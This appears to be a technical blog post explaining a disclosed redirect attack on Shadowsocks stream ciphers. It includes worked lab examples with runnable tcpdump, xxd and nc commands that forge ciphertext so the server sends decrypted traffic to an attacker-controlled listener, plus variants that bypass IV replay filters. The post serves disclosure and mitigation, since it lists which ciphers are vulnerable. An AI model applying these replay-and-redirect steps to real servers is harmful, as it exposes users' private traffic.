Decryption vulnerability in Shadowsocks stream ciphers

Zhiniang Peng (@edwardz246003) of Qihoo 360 Core Security has discovered and disclosed a devastating vulnerability in Shadowsocks stream ciphers. Under modest assumptions, an attacker can get full decryption of recorded Shadowsocks sessions, without knowing the password.

Redirect attack on Shadowsocks stream ciphers (PDF) (archive)
Home page with Python proof of concept (archive)

This post is my attempt to explain the vulnerability as I understand it.

The attack works by using the Shadowsocks server as a decryption oracle, causing it to decrypt a previously recorded encrypted stream and send the plaintext to a target controlled by the attacker. The attack is possible under the following conditions:

The Shadowsocks server must be configured to use one of the stream ciphers. The attack relies on modifying recorded ciphertexts, so it does not work with AEAD ciphers.
The attacker must be in a position to record an encrypted Shadowsocks connection; i.e., must be on the network path between the Shadowsocks client and the Shadowsocks server.
The Shadowsocks server must still be running, with the same password.
The attacker must be able to guess the first 7 bytes of the plaintext.

The attacker does not need to know the Shadowsocks password. The attacker relies on the fact that the Shadowsocks server does know the password, and tricks the server into decrypting a message and sending it where the attacker can read it.

How Shadowsocks stream ciphers work

The client and server derive a shared symmetric encryption key from a password. The key never changes: it is the same for every connection and in both directions.

The client sends to the server a random initialization vector (IV), an encrypted target specification, and an encrypted payload that the server should decrypt and send to the target.

[          client IV           ][   target   ][ upstream payload ...

The server decrypts the target specification using the client's IV and the shared key. If the target specification is syntactically valid, the server connects to the target, then starts decrypting the client's payload and forwarding the plaintext to the target. Whatever the target sends back, the server encrypts and sends back to the client, under a separate random IV.

[          server IV           ][ downstream payload ...

A target specification is 7 bytes long. The first byte is the static value 1; the next 4 bytes are an IPv4 address; and the last 2 bytes are a port number. (For simplicity, we will only look at IPv4 targets. Actually there are two other target specification formats: type 4 is an IPv6 address (19 bytes total) and type 3 is a hostname (variable length).)

|type|    IPv4 address   |   port  |
+----+----+----+----+----+----+----+
|  1 |      A.B.C.D      |   XXYY  |
+----+----+----+----+----+----+----+
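
To make the layout concrete, here is a minimal Python sketch of parsing the 7-byte IPv4 form. It is not taken from any Shadowsocks implementation; the function name `parse_ipv4_target` is made up for illustration, and the error text only imitates the server log message shown later in this post.

```python
import ipaddress
import struct


def parse_ipv4_target(header: bytes):
    """Parse a 7-byte IPv4 target specification: type, address, port."""
    if len(header) < 7:
        raise ValueError("need at least 7 bytes")
    addrtype = header[0]
    if addrtype != 1:
        # Only the IPv4 form (type 1) is handled in this sketch.
        raise ValueError(f"unsupported addrtype {addrtype}")
    address = ipaddress.IPv4Address(header[1:5])   # 4 bytes, network order
    (port,) = struct.unpack("!H", header[5:7])     # 2 bytes, big-endian
    return str(address), port


print(parse_ipv4_target(bytes.fromhex("01cb0071051f40")))
# ('203.0.113.5', 8000)
```

Note that the only syntactic check is on the first byte; any 6 bytes after a 1 form a valid address and port.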

Stream ciphers have no integrity checks. Whatever you send to the server, it will decrypt, and if the first 7 bytes after the IV happen to decrypt to a valid target specification, the server will connect to that target and send it the decryption of the rest of the stream. This means, for example, that if you connect to a Shadowsocks server and just send it random bytes, with probability 1/256 the first byte will decrypt to a 1, which is all that is required for a target specification to be syntactically valid. When that happens, the Shadowsocks server will decrypt the rest of the stream and send the plaintext... somewhere. Where? To whatever random IPv4 address and port the other 6 bytes of the target specification happen to decrypt to.

Stream ciphers are also malleable. This means that if you XOR a value into the ciphertext, that same value will be XORed into the plaintext after decryption.
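
Malleability is easy to see with a toy example. The sketch below does not use any Shadowsocks cipher: `toy_keystream` is a hypothetical stand-in built from SHA-256, used only because it behaves like a generic XOR-based stream cipher. The key, IV, and message are invented for the demonstration.

```python
import hashlib


def toy_keystream(key: bytes, iv: bytes, length: int) -> bytes:
    """Toy keystream (SHA-256 over key, IV, counter). NOT a real cipher."""
    stream = b""
    counter = 0
    while len(stream) < length:
        stream += hashlib.sha256(key + iv + counter.to_bytes(8, "big")).digest()
        counter += 1
    return stream[:length]


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def toy_crypt(key: bytes, iv: bytes, data: bytes) -> bytes:
    """Encrypt or decrypt: both are an XOR with the keystream."""
    return xor(data, toy_keystream(key, iv, len(data)))


key, iv = b"hypothetical key", b"hypothetical iv"
ciphertext = toy_crypt(key, iv, b"attack at dawn")

# The attacker does not know the key, only that the message ends in "dawn".
delta = bytes(10) + xor(b"dawn", b"dusk")   # zeros leave the first 10 bytes alone
tampered = xor(ciphertext, delta)

print(toy_crypt(key, iv, tampered))
# b'attack at dusk'
```

The attacker changed the plaintext in a chosen way without ever learning the keystream; all that was needed was a correct guess of the original bytes.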

Attack walkthrough

I'll walk through the process of decrypting a recorded stream in the server→client direction. That direction is easier because it's easier to guess the first 7 bytes of the plaintext.

Let's set up a local Shadowsocks server and client using the Python implementation.

shadowsocks/server.py -s 127.0.0.1 -p 8388 -k password -m aes-256-cfb
shadowsocks/local.py -s 127.0.0.1 -p 8388 -k password -m aes-256-cfb -l 1080

Now start capturing traffic and request a web page through the Shadowsocks client.

tcpdump -i lo -U -w shadowsocks.pcap port 8388
curl -4 -x socks5://127.0.0.1:1080/ http://example.com/

From the traffic capture we get the encrypted server→client stream:

d57aa290e7d6ac989897c15acfab0e897c20f534e986dbce37f555c6760ea24f
aa928f760db22438c8963c57e83b36fec4933f3785e2c37cd4fb25e0a4047c08
84742bcb00f19493a6ea4d5c0874f7f869b31052a9d058c5427e7ccec47b568f
4c131915550b0c5e1ccafc99f0a77923e2af4ad2606ad9876ecae789b61ea225
...

What happens if we replay this ciphertext to the server with no changes? (Note, this is an unusual type of replay attack: we are sending the server's own output back to it. Remember, the encryption key in both directions is the same. The xxd -r -p command converts hex to binary.)

echo d57aa290e7d6ac989897c15acfab0e897c20f534e986dbce37f555c6760ea24f \
     aa928f760db22438c8963c57e83b36fec4933f3785e2c37cd4fb25e0a4047c08 \
     84742bcb00f19493a6ea4d5c0874f7f869b31052a9d058c5427e7ccec47b568f \
     4c131915550b0c5e1ccafc99f0a77923e2af4ad2606ad9876ecae789b61ea225 \
| xxd -r -p | nc 127.0.0.1 8388

The connection fails and the server outputs an error, unsupported addrtype 72:

WARNING  unsupported addrtype 72, maybe wrong password or encryption method
ERROR    can not parse header

What is addrtype 72? 72 is the ASCII code for H. The server has decrypted the ciphertext—getting a plaintext that starts with HTTP/1.1 200 OK—and interpreted the first 7 bytes, HTTP/1., as a target specification. But the first byte of a target specification is supposed to be 1, not 72. Therefore the target specification is not valid and the server rejects the connection.

What if we modify the 17th byte? That is the first byte after the IV, corresponding to the type field of the target specification. Its original value is 0x7c, which we know decrypts to 72. The stream cipher is malleable, so anything we XOR into the ciphertext will also be XORed into the plaintext. If we XOR 0x7c with 72, then instead of decrypting to 72, it should decrypt to 0. Try changing the 17th byte from 0x7c to 0x34 (which is 0x7c XOR 72):

                                     ↓↓
echo d57aa290e7d6ac989897c15acfab0e893420f534e986db \
| xxd -r -p | nc 127.0.0.1 8388

The server decrypts an addrtype 0, as expected.

WARNING  unsupported addrtype 0, maybe wrong password or encryption method
ERROR    can not parse header

Now what if we additionally XOR in a value of 1, so that the byte decrypts to 1? 0x34 XOR 1 = 0x35.

                                     ↓↓
echo d57aa290e7d6ac989897c15acfab0e893520f534e986db \
| xxd -r -p | nc 127.0.0.1 8388

Now the server gets an addrtype 1, so it thinks it has an IPv4 address specification. The server tries to make a connection to... somewhere.

INFO     connecting 84.84.80.47:12590

What is the address 84.84.80.47:12590? It's just the 6 bytes TTP/1., interpreted as an IPv4 address and port: 84 = T, 84 = T, 80 = P, 47 = /, etc. The Shadowsocks server has connected to some target and sent it the decryption of a previously recorded encrypted stream.
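
The conversion from text to address can be checked in a few lines of Python. This is only an illustration of the byte interpretation; `decode_target` is a made-up helper name.

```python
import socket
import struct


def decode_target(raw: bytes) -> str:
    """Interpret 6 bytes as an IPv4 address followed by a big-endian port."""
    address = socket.inet_ntoa(raw[:4])
    (port,) = struct.unpack("!H", raw[4:6])
    return f"{address}:{port}"


print(decode_target(b"TTP/1."))
# 84.84.80.47:12590
```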

We exploited ciphertext malleability to cause the first byte of the target specification to decrypt to 1. We can do the same thing with the other 6 bytes to make them decrypt to the address of a target we control. Let's say our address is 203.0.113.5:8000. We take the 6 bytes of the ciphertext that represent the address:

20f534e986db

and XOR them with TTP/1. (= 5454502f312e):

20f534e986db XOR 5454502f312e = 74a164c6b7f5

(If the server were to decrypt 74a164c6b7f5, it would decrypt to 000000000000.) We take that result and additionally XOR it with the bytes of our address (203.0.113.5:8000 = cb0071051f40):

74a164c6b7f5 XOR cb0071051f40 = bfa115c3a8b5

Replace those 6 bytes in the ciphertext, along with the type byte we already changed, then append the rest of the ciphertext. The sleep 1 is to force nc to send the target specification and payload in separate packets, which is a requirement of server.py.

                                      ↓↓↓↓↓↓↓↓↓↓↓↓↓↓
(echo d57aa290e7d6ac989897c15acfab0e8935bfa115c3a8b5 \
 | xxd -r -p; \
 sleep 1; \
 echo ce37f555c6760ea24faa928f760db22438c8963c57e83b36fec4933f3785e2c3 \
      7cd4fb25e0a4047c0884742bcb00f19493a6ea4d5c0874f7f869b31052a9d058 \
      c5427e7ccec47b568f4c131915550b0c5e1ccafc99f0a77923e2af4ad2606ad9 \
 | xxd -r -p) | nc 127.0.0.1 8388

The server output shows that the address was successfully changed:

INFO     connecting 203.0.113.5:8000
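
The byte arithmetic behind that request can be double-checked with a short Python sketch. It is not part of the original proof of concept, and the helper names (`xor_all`, `target_spec`) are invented for illustration; the hex values are the ones from the capture above.

```python
import socket
import struct
from functools import reduce


def xor_all(*chunks: bytes) -> bytes:
    """XOR any number of equal-length byte strings together."""
    return bytes(reduce(lambda x, y: x ^ y, column) for column in zip(*chunks))


def target_spec(host: str, port: int) -> bytes:
    """Build a 7-byte IPv4 target specification (type 1)."""
    return b"\x01" + socket.inet_aton(host) + struct.pack("!H", port)


recorded = bytes.fromhex("7c20f534e986db")   # first 7 ciphertext bytes after the IV
guess = b"HTTP/1."                           # guessed plaintext of those bytes
wanted = target_spec("203.0.113.5", 8000)    # what the server should see instead

forged = xor_all(recorded, guess, wanted)
print(forged.hex())
# 35bfa115c3a8b5
```

The result matches the 7 bytes that follow the IV in the command above.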

We can run a listener at 203.0.113.5:8000 to receive the decryption. The HTTP/1. is missing, because that part was interpreted as a target specification. After the 1 200 OK\r, one block (16 bytes) is garbage, because of how CFB mode works. But everything after that is pristine plaintext. In CTR mode there is no garbage block.

nc -l 8000 | xxd
00000000: 3120 3230 3020 4f4b 0df5 0baf c709 8c8d  1 200 OK........
00000010: ed6e 360e 19da ce80 1b62 7974 6573 0d0a  .n6......bytes..
00000020: 4167 653a 2034 3134 3631 310d 0a43 6163  Age: 414611..Cac
00000030: 6865 2d43 6f6e 7472 6f6c 3a20 6d61 782d  he-Control: max-
00000040: 6167 653d 3630 3438 3030 0d0a 436f 6e74  age=604800..Cont
00000050: 656e 742d 5479 7065 3a20 7465 7874 2f68  ent-Type: text/h

To recap: the attacker has an encrypted stream but doesn't know the key. The Shadowsocks server does know the key, and is willing to decrypt whatever you send it and send the plaintext somewhere. By modifying the first 7 bytes of the ciphertext, the attacker can control that somewhere and make it point to a target under its own control. The replacement for those 7 bytes is: recorded ciphertext XOR guessed plaintext XOR attacker's target specification.

Decrypting the client→server direction

The server→client direction is relatively easy to attack, because many common server protocols start with the same bytes (e.g. HTTP/1. for HTTP), or have only a small number of bytes that need to be brute-forced (e.g. \x16\x03???\x02\x00 for TLS).

In the client→server direction, the attacker again has to guess the first 7 bytes of the plaintext. The first 7 bytes sent by the client will always be part of a target specification. One option is to first decrypt the server→client direction, and use that information to infer what the original target was. For example, if the contents of the response indicate that the target was example.com, the attacker can see that example.com is at the address 93.184.216.34:80 and guess 015db8d8220050 for the plaintext using an IPv4 target specification, or guess 030b6578616d70 (\x03\x0bexamp) using a hostname target specification.
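
The two guesses in that example can be reproduced with the following sketch. The helper names are hypothetical. The hostname layout (type byte 3, one length byte, the name, then a 2-byte port) is an assumption based on the SOCKS5-style address format; only the first 7 bytes matter for the attack.

```python
import socket
import struct


def ipv4_spec(host: str, port: int) -> bytes:
    """Type 1: one type byte, 4 address bytes, 2 port bytes."""
    return b"\x01" + socket.inet_aton(host) + struct.pack("!H", port)


def hostname_spec(name: str, port: int) -> bytes:
    """Type 3 (assumed layout): type byte, length byte, name, 2 port bytes."""
    encoded = name.encode("ascii")
    return b"\x03" + bytes([len(encoded)]) + encoded + struct.pack("!H", port)


# Candidate guesses for the first 7 plaintext bytes of the client's stream.
print(ipv4_spec("93.184.216.34", 80)[:7].hex())    # 015db8d8220050
print(hostname_spec("example.com", 80)[:7].hex())  # 030b6578616d70
```

An attacker who is unsure which form the client used can simply try each candidate in turn.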

If the server happens to use a CFB mode stream cipher, it is even easier. The attacker can send the modified replay of the server→client stream as before, then simply append the client→server stream. Because of CFB's self-synchronizing behavior, the Shadowsocks server will start to output the plaintext of the client→server stream, after one block of garbage.

Mitigation

The attack only works against Shadowsocks stream ciphers, not AEAD ciphers. AEAD ciphers have integrity protection, so an attacker cannot modify and replay ciphertexts.

Stream ciphers (BAD): aes-128-ctr, aes-192-ctr, aes-256-ctr, aes-128-cfb, aes-192-cfb, aes-256-cfb, camellia-128-cfb, camellia-192-cfb, camellia-256-cfb, chacha20-ietf, bf-cfb, chacha20, salsa20, rc4-md5
AEAD ciphers (OK): chacha20-ietf-poly1305, aes-256-gcm, aes-192-gcm, aes-128-gcm

Some implementations of Shadowsocks, like shadowsocks-libev, have a replay filter that prohibits initialization vectors that have already been used. The filter in shadowsocks-libev even remembers IVs that the server itself sends. At first, it appears that a replay filter prevents the decryption attack, but it does not.

In the attack as described, the attacker observes a sequence of 16-byte blocks:

IV, C₁, C₂, C₃, C₄, ...

The attacker guesses the plaintext of the first 7 bytes of C₁, and XORs that guess and its own target specification into the ciphertext to produce C₁′. The attacker sends to the server:

IV, C₁′, C₂, C₃, C₄, ...

A server with a replay filter would reject the connection because IV is reused. If you try the attack as described against shadowsocks-libev, the server will reject the connection and write an error message to the log:

ERROR: crypto: stream: repeat IV detected

But it's possible to adapt the attack to make it work even in the presence of a replay filter. Exactly how depends on what cipher is used.
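
The underlying weakness is that a replay filter only recognizes IV values it has seen before. The sketch below models such a filter as a plain set; this is a simplification for illustration and not how shadowsocks-libev actually stores IVs. The class name `ToyReplayFilter` is made up, and the hex values come from the walkthrough capture.

```python
class ToyReplayFilter:
    """Simplified model of an IV replay filter: remember every IV seen."""

    def __init__(self):
        self._seen = set()

    def accept(self, iv: bytes) -> bool:
        """Return False for a repeated IV; otherwise remember it and return True."""
        if iv in self._seen:
            return False
        self._seen.add(iv)
        return True


iv = bytes.fromhex("d57aa290e7d6ac989897c15acfab0e89")
c1 = bytes.fromhex("7c20f534e986dbce37f555c6760ea24f")
iv_plus_1 = (int.from_bytes(iv, "big") + 1).to_bytes(16, "big")

replay_filter = ToyReplayFilter()
replay_filter.accept(iv)                 # the recorded connection used this IV

print(replay_filter.accept(iv))          # False: a straight replay is rejected
print(replay_filter.accept(c1))          # True: a ciphertext block is a "new" IV
print(replay_filter.accept(iv_plus_1))   # True: so is the IV plus one
```

Any value that differs from a remembered IV passes, so the attacker only needs a different IV under which the recorded ciphertext still decrypts usefully.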

CFB mode

In CFB mode, instead of guessing the plaintext of the first 7 bytes of C₁ to produce C₁′, the attacker can guess the plaintext of the first 7 bytes of C₂ to produce C₂′, and send C₁ in place of the IV. I.e., the attacker observes

IV, C₁, C₂, C₃, C₄, ...

and then sends

C₁, C₂′, C₃, C₄, ...

The server interprets C₁ as the IV, sees that it has not been used for an IV before, and so allows the connection.

As proof of the idea, let's revisit the example from the first comment (the attack walkthrough above), which uses the cipher aes-256-cfb, with shadowsocks-libev.

ss-server -s 127.0.0.1 -p 8388 -k password -m aes-256-cfb
ss-local -s 127.0.0.1 -p 8388 -k password -m aes-256-cfb -l 1080
curl -4 -x socks5://127.0.0.1:1080/ http://example.com/

The ciphertext blocks, along with their plaintexts, are:

IV = d57aa290e7d6ac989897c15acfab0e89
C₁ = 7c20f534e986dbce37f555c6760ea24f  "HTTP/1.1 200 OK\r"
C₂ = aa928f760db22438c8963c57e83b36fe  "\nAccept-Ranges: "
C₃ = c4933f3785e2c37cd4fb25e0a4047c08  "bytes\r\nAge: 4146"
C₄ = 84742bcb00f19493a6ea4d5c0874f7f8  "11\r\nCache-Contro"

Take the first 7 bytes of C₂ (aa928f760db224), XOR them with a guess for the plaintext (\nAccept = 0a416363657074), and XOR that with the attacker's target specification (IPv4 203.0.113.5:8000 = 01cb0071051f40). The XOR of all these is a118ec646ddd10, so the new C₂′ is a118ec646ddd1038c8963c57e83b36fe. Now remove IV and send C₁, C₂′, C₃, C₄, ... to the server:

                                       ↓↓↓↓↓↓↓↓↓↓↓↓↓↓
(echo 7c20f534e986dbce37f555c6760ea24f a118ec646ddd10 \
 | xxd -r -p; \
 sleep 1; \
 echo 38c8963c57e83b36fe \
      c4933f3785e2c37cd4fb25e0a4047c08 84742bcb00f19493a6ea4d5c0874f7f8 \
 | xxd -r -p) | nc 127.0.0.1 8388

The attacker's listener gets the last 9 bytes of the plaintext of C₂, then a block of garbage, then the plaintext of block C₄ and all later blocks.

nc -l 8000 | xxd
00000000: 2d52 616e 6765 733a 20b7 1d8b a81a 3ac8  -Ranges: .....:.
00000010: 326f cdaf cc00 c1b0 4b31 310d 0a43 6163  2o......K11..Cac

If you need to get all the plaintext, including the early blocks, you can take advantage of the self-synchronizing property of CFB and do something like:

C₁, C₂′, IV, C₁, C₂, C₃, C₄, ...
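
Both CFB variants can be simulated without a real server. The sketch below is a toy model under stated assumptions: `block_fn` is a hypothetical stand-in for AES built from SHA-256 (CFB only ever uses the block cipher in the forward direction, so any keyed function shows the same structure), and the key and IV are invented. It does not talk to Shadowsocks.

```python
import hashlib

BLOCK = 16


def block_fn(key: bytes, block: bytes) -> bytes:
    """Stand-in for the block cipher's encrypt operation. NOT AES."""
    return hashlib.sha256(key + block).digest()[:BLOCK]


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def cfb_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    out, prev = b"", iv
    for i in range(0, len(plaintext), BLOCK):
        prev = xor(plaintext[i:i + BLOCK], block_fn(key, prev))
        out += prev                      # the ciphertext block feeds the next step
    return out


def cfb_decrypt(key: bytes, iv: bytes, ciphertext: bytes) -> bytes:
    out, prev = b"", iv
    for i in range(0, len(ciphertext), BLOCK):
        chunk = ciphertext[i:i + BLOCK]
        out += xor(chunk, block_fn(key, prev))
        prev = chunk
    return out


key, iv = b"server-only key", bytes(range(BLOCK))    # invented values
plaintext = (b"HTTP/1.1 200 OK\r" b"\nAccept-Ranges: "
             b"bytes\r\nAge: 4146" b"11\r\nCache-Contro")
ct = cfb_encrypt(key, iv, plaintext)
c1, c2, c3, c4 = (ct[i:i + BLOCK] for i in range(0, len(ct), BLOCK))

# Attacker side: no key, only the recorded blocks and a guess for C2's plaintext.
target = bytes.fromhex("01cb0071051f40")             # 203.0.113.5:8000
c2_forged = xor(c2[:7], xor(b"\nAccept", target)) + c2[7:]

# Variant 1: send C1 as the IV, then C2', C3, C4.
seen = cfb_decrypt(key, c1, c2_forged + c3 + c4)
print(seen[:7].hex())   # the attacker's target specification
print(seen[7:16])       # rest of C2's plaintext
print(seen[32:])        # C4's plaintext, after one garbage block

# Variant 2: append IV, C1, C2, ... to recover the whole stream.
full = cfb_decrypt(key, c1, c2_forged + iv + c1 + c2 + c3 + c4)
print(full[32:] == plaintext)
```

In the second variant the block that decrypts the appended IV is garbage, and everything after it is the complete original plaintext, which is the self-synchronizing behavior the attack relies on.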

CTR mode

In CTR mode, the attacker similarly guesses the plaintext of the first 7 bytes of C₂ instead of C₁, removes C₁ from the sequence, and increments the original IV by 1. I.e., the attacker observes

IV, C₁, C₂, C₃, C₄, ...

and then sends

IV+1, C₂′, C₃, C₄, ...

The server sees that IV+1 has not been used before, and allows the connection.
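
The reason this works is that in CTR mode the keystream for block n is derived from IV + (n - 1), so a stream that starts at IV+1 lines up exactly with C₂. Here is a toy simulation of that alignment. As an assumption for illustration, `prf` (built from SHA-256) stands in for AES, the counter is treated as a 128-bit big-endian integer, and the key and IV are invented.

```python
import hashlib

BLOCK = 16


def prf(key: bytes, counter_block: bytes) -> bytes:
    """Stand-in for encrypting one counter block. NOT AES."""
    return hashlib.sha256(key + counter_block).digest()[:BLOCK]


def add_to_iv(iv: bytes, n: int) -> bytes:
    """Treat the IV as a big-endian 128-bit counter and add n (wrapping)."""
    return ((int.from_bytes(iv, "big") + n) % (1 << 128)).to_bytes(BLOCK, "big")


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def ctr_crypt(key: bytes, iv: bytes, data: bytes) -> bytes:
    """Encrypt or decrypt: XOR each block with prf(key, IV + block index)."""
    out = b""
    for i in range(0, len(data), BLOCK):
        out += xor(data[i:i + BLOCK], prf(key, add_to_iv(iv, i // BLOCK)))
    return out


key, iv = b"server-only key", bytes(range(BLOCK))    # invented values
plaintext = (b"HTTP/1.1 200 OK\r" b"\nAccept-Ranges: "
             b"bytes\r\nAge: 4683" b"74\r\nCache-Contro")
ct = ctr_crypt(key, iv, plaintext)

# Attacker side: drop C1, patch the first 7 bytes of C2, bump the IV by one.
target = bytes.fromhex("01cb0071051f40")             # 203.0.113.5:8000
forged = xor(ct[16:23], xor(b"\nAccept", target)) + ct[23:]
seen = ctr_crypt(key, add_to_iv(iv, 1), forged)

print(seen[:7].hex())   # the attacker's target specification
print(seen[7:])         # everything after the guessed bytes, with no garbage
```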

Let's get a new traffic capture with shadowsocks-libev using the aes-256-ctr cipher.

ss-server -s 127.0.0.1 -p 8388 -k password -m aes-256-ctr
ss-local -s 127.0.0.1 -p 8388 -k password -m aes-256-ctr -l 1080
curl -4 -x socks5://127.0.0.1:1080/ http://example.com/

The ciphertext blocks and their corresponding plaintexts are:

IV = 78a5f49ff7ad611765bf232574566591
C₁ = 7dc2dcb7cdcdb2816e91681f37062483  "HTTP/1.1 200 OK\r"
C₂ = c35ad20be2c3e9e6ff9a99721071a3f9  "\nAccept-Ranges: "
C₃ = 6b03ae4e042deaa570534209b1b2d62c  "bytes\r\nAge: 4683"
C₄ = 445ed56831c4cb1348accbea14ddfde2  "74\r\nCache-Contro"

Exactly as in the CFB case, take the first 7 bytes of C₂ (c35ad20be2c3e9), XOR them with a guess for the plaintext (\nAccept = 0a416363657074), and XOR that with the attacker's target specification (IPv4 203.0.113.5:8000 = 01cb0071051f40). The XOR of all these is c8d0b11982acdd, so the new C₂′ is c8d0b11982acdde6ff9a99721071a3f9. Now send IV+1, C₂′, C₃, C₄, ... to the server:

                                    ↓↓ ↓↓↓↓↓↓↓↓↓↓↓↓↓↓
(echo 78a5f49ff7ad611765bf232574566592 c8d0b11982acdd \
 | xxd -r -p; \
 sleep 1; \
 echo e6ff9a99721071a3f9 \
      6b03ae4e042deaa570534209b1b2d62c 445ed56831c4cb1348accbea14ddfde2 \
 | xxd -r -p) | nc 127.0.0.1 8388
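
The two values marked with arrows in that command can be recomputed as follows. This sketch assumes, consistently with the example, that the IV is incremented as a single big-endian integer; the variable names are arbitrary.

```python
iv = bytes.fromhex("78a5f49ff7ad611765bf232574566591")
c2 = bytes.fromhex("c35ad20be2c3e9e6ff9a99721071a3f9")
guess = b"\nAccept"                        # guessed plaintext of C2's first 7 bytes
target = bytes.fromhex("01cb0071051f40")   # IPv4 203.0.113.5:8000

# IV+1, wrapping around at 128 bits.
iv_plus_1 = ((int.from_bytes(iv, "big") + 1) % (1 << 128)).to_bytes(16, "big")

# C2' = (first 7 bytes of C2 XOR guess XOR target), then the rest of C2 unchanged.
patched = bytes(c ^ g ^ t for c, g, t in zip(c2, guess, target))
c2_forged = patched + c2[7:]

print(iv_plus_1.hex())   # 78a5f49ff7ad611765bf232574566592
print(c2_forged.hex())   # c8d0b11982acdde6ff9a99721071a3f9
```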

The attacker's listener gets all the plaintext starting with the last 9 bytes of C₂. I don't know how to adapt this technique to get the plaintext of C₁.

nc -l 8000 | xxd
00000000: 2d52 616e 6765 733a 2062 7974 6573 0d0a  -Ranges: bytes..
00000010: 4167 653a 2034 3638 3337 340d 0a43 6163  Age: 468374..Cac
